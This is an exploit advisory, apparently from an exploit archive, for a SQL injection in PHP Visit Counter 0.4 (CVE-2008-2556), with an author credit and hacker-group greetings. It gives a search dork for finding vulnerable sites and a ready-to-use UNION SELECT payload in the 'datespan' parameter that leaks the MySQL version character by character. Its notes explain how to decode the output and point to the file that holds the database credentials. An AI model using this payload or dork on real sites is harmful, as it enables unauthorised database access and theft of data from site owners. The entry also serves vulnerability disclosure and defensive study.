PHP Visit Counter 0.4 - 'datespan' SQL Injection

Author: Lidloses_Auge
type: webapps
platform: php
port: 
date_added: 2008-05-30  
date_updated: 2016-12-01  
verified: 1  
codes: OSVDB-45978;CVE-2008-2556  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5703.txt  

###############################################################
#
#           PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#
#      Vulnerability discovered by: Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   GPM, Free-Hack, Ciphercrew, h4ck-y0u
#      Date:                        30.05.2008
#
###############################################################
#
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################

# milw0rm.com [2008-05-31]